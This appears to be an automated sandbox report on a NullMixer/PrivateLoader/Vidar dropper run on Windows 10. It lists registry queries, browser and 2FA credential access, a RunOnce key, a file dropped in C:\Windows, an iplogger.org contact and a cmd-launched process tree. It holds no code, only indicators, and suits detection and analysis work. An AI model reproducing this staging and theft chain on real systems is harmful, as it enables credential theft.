2024-12-07 09:18

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Vidar

stealer vidar

Vidar family

vidar

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe
PID 3572 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe
PID 1940 wrote to memory of 1184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe
PID 1940 wrote to memory of 1184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe
PID 1008 wrote to memory of 2000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe
PID 1008 wrote to memory of 2000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 936 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe
PID 936 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2772 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 2772 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

